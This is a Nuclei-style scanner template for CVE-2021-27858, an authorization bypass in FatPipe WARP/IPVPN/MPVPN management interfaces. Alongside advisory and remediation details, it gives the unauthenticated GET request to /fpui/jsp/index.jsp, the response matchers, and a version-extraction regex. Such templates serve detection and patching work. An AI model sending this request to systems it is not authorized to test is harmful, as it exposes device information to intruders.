FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain a missing authorization caused by lack of access control in the web management interface, letting remote attackers access sensitive URLs, exploit requires no authentication.
PoC代码[已公开]
id: CVE-2021-27858
info:
name: FatPipe WARP/IPVPN/MPVPN - Authorization Bypass
author: gy741
severity: medium
description: |
FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain a missing authorization caused by lack of access control in the web management interface, letting remote attackers access sensitive URLs, exploit requires no authentication.
impact: |
Unauthenticated attackers can access sensitive management interface URLs and obtain device information due to missing authorization checks.
remediation: |
Upgrade to FatPipe WARP/IPVPN/MPVPN version 10.1.2r60p91 or 10.2.2r42 or later.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
- https://www.fatpipeinc.com/support/advisories.php
- https://www.fatpipeinc.com/support/cve-list.php
- https://www.zeroscience.mk/codes/fatpipe_auth.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-27858
cwe-id: CWE-862
epss-score: 0.37835
epss-percentile: 0.97072
cpe: cpe:2.3:o:fatpipeinc:warp_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: fatpipeinc
product: warp_firmware
tags: cve,cve2021,fatpipe,auth-bypass,router,vuln
http:
- raw:
- |
GET /fpui/jsp/index.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "productType"
- "type:"
- "version:"
- "<title>FatPipe Networks</title>"
condition: and
extractors:
- type: regex
part: body
regex:
- 'version: "([0-9.a-z]+)"'
# digest: 490a0046304402204dd50f2cbe77080ba575520fd5f1fadf7e6ba5aef06ee472d2e8db4cd714ba950220152c1f3bcc8a5bbec9171e00df76fd3e9bc2e2816ec022c2ffaeca77eded619d:922c64590222798bb761d5b6d8e72950